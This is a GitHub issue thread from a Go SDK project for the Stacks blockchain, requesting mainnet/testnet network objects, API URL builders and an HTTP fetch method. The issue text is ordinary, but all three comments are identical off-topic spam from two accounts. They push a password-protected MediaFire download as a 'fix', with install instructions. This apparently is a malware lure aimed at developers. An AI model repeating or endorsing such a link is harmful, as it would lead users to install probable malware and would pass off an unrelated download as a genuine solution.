### ISSUE TITLE
Implement Stacks Network Interaction

### ISSUE THREAD

**Issue by CyrusVorwald** [icon-project/stacks-go-sdk#4]
To interact with the Stacks blockchain, we need to implement network-specific functionality. This includes creating network objects for mainnet and testnet, as well as methods for fetching account information and broadcasting transactions.

### Tasks
- Implement `StacksNetwork` struct with necessary fields (coreAPIURL, version, chainID)
- Create `NewStacksMainnet()` and `NewStacksTestnet()` functions
- Implement methods for constructing API URLs:
  - `GetAccountAPIURL(address string)`
  - `GetBroadcastAPIURL()`
  - `GetTransferFeeEstimateAPIURL()`
  - `GetTransactionFeeEstimateAPIURL()`
- Implement `FetchFn(url string)` method for making HTTP requests

### Acceptance Criteria
- Network objects can be created for both mainnet and testnet
- All API URL methods return correct endpoints
- `FetchFn` successfully makes HTTP GET requests

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
